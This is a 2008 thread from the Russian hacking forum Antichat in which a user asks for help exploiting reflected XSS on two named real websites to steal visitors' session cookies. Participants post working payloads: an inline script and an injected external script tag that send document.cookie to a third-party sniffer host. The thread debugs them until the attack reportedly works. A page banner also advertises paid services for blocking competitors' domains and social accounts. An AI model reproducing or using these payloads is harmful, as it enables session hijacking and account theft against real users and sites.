Помогите разобраться с Xss

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Помогите разобраться с Xss

Опции темы

Поиск в этой теме

Опции просмотра

Помогите разобраться с Xss

02.05.2008, 16:27

AARON

Участник форума

Регистрация: 29.04.2008

Сообщений: 106

С нами: 9492068

Репутация: 46

Помогите разобраться с Xss

Здравствуйте, товарисчи!

Помогите плз разобраться с XSS. Перечитал по инета... Не работает.

Значит проблема такова: нашел я туеву хучу сайтов с пассивными xss. Алерт есть, вроде нихрена не фильтруется...

Вот пару сайтов.

www.pit-pc.ru
www.softoman.ru

Зарегил сниффер на s.netsec.ru. Логин у меня там nick_314

составил соотв. запрос

<script>img = new Image(); img.src = "http://s.netsec.ru/Nick_314.gif?"+document.cookie;</script>

Сам перехожу по ссылке... По идее должен переходить мой sess_id, а вот хрен. Не пашет...

Переводил в char - не приходит... Просвятите ламера, что не так?

𝕏 Twitter Reddit Telegram Копировать ссылку

02.05.2008, 16:37

AARON

Участник форума

Регистрация: 29.04.2008

Сообщений: 106

С нами: 9492068

Репутация: 46

Извините, перепутал раздел... Переместите , пожалуйста.

04.05.2008, 19:02

DimOnOID

Постоянный

Регистрация: 05.12.2006

Сообщений: 477

С нами: 10226672

Репутация: 441

допустим на pit-pc.ru фильтурет ковычки....
сделай проще

http://www.pit-pc.ru/index.php?searchstring="><SCRIPT SRC=http://твойсайт.ru/js.js></SCRIPT>

где содержание js.js
допустим такое

Код:

img = new Image(); img.src = "http://s.netsec.ru/nick_314.gif?"+document.cookie;

04.05.2008, 19:13

desTiny

Reservists Of Antichat - Level 6

Регистрация: 04.02.2007

Сообщений: 1,152

С нами: 10139366

Репутация: 1502

Цитата:

Сообщение от DimOnOID

допустим на pit-pc.ru фильтурет ковычки....

Цитата:

Сообщение от DimOnOID

http://www.pit-pc.ru/index.php?searchstring="><SCRIPT SRC=http://твойсайт.ru/js.js></SCRIPT>

Ты странный

...
searchstring="><

__________________
Bedankt euch dafür bei euch selbst.

H_2(S^3/((z1, z2)~(exp(2pi*i/p)z1, exp(2pi*q*i/p)z2)))=Z/pZ

04.05.2008, 20:00

DimOnOID

Постоянный

Регистрация: 05.12.2006

Сообщений: 477

С нами: 10226672

Репутация: 441

в код глянь...=\

04.05.2008, 22:40

AARON

Участник форума

Регистрация: 29.04.2008

Сообщений: 106

С нами: 9492068

Репутация: 46

Спасибо большое, сейчас попробую.

04.05.2008, 23:15

AARON

Участник форума

Регистрация: 29.04.2008

Сообщений: 106

С нами: 9492068

Репутация: 46

Значит попробовал. Результат - ноль...

ЗАрегился я по-быстренькому на Holm.ru
http://www.angryhacker.h18.ru

Залил Js.js

Цитата:

img = new Image(); img.src = "http://s.netsec.ru/nick_314.gif?"+document.cookie;

Делаю соотв. запрос

http://www.pit-pc.ru/index.php?searchstring="><SCRIPT SRC=http://www.angryhacker.h18.ru/js.js></SCRIPT>

Не работает. Грешу на holm.ru...

Последний раз редактировалось AARON; 04.05.2008 в 23:18..

05.05.2008, 00:14

Qwazar

Leaders of Antichat - Level 4

Регистрация: 02.06.2005

Сообщений: 1,411

С нами: 11020706

Репутация: 4693

Nick_314 - с большой или маленькой буквы? Просто захожу на http://s.netsec.ru/nick_314.gif - там ничего нет.

__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.

05.05.2008, 00:50

DimOnOID

Постоянный

Регистрация: 05.12.2006

Сообщений: 477

С нами: 10226672

Репутация: 441

Проверь ещё раз всё хорошенько)..всё должно работать)......ну на крайний зарегай на tu1.ru )

#10

06.05.2008, 15:08

AARON

Участник форума

Регистрация: 29.04.2008

Сообщений: 106

С нами: 9492068

Репутация: 46

Все, разобрался. Теперь работает. Как выяснилось, логин nick_314 почему-то не работал... Я просто зарегил новый и теперь все тип-топ!

Спасибо за помошь, можно закрывать.

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Купил Asus 1814bl. Читает, а не пишет. Помогите разобраться. ООЧЕНЬ ПРОШУ	Хелпер	Болталка	2	05.01.2008 06:16
Помогите с Xss	TRv2	Уязвимости	11	04.10.2007 16:27
Помогите разобраться с угоном Аськи	seeattact	Skype, IRC, ICQ, Jabber и другие IM	5	17.01.2006 03:14
Cross Site Scripting FAQ	k00p3r	Уязвимости	6	12.06.2005 16:23

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход